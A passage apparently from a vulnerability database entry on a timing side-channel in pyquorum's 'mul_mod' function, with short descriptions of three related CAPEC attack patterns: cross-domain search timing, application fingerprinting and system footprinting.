  "summary": "pyquorum: Timing side\u2011channel in mul_mod"
}

No mitigation information available for this CWE.

CAPEC-462: Cross-Domain Search Timing

An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.

CAPEC-541: Application Fingerprinting

An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.

CAPEC-580: System Footprinting

An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.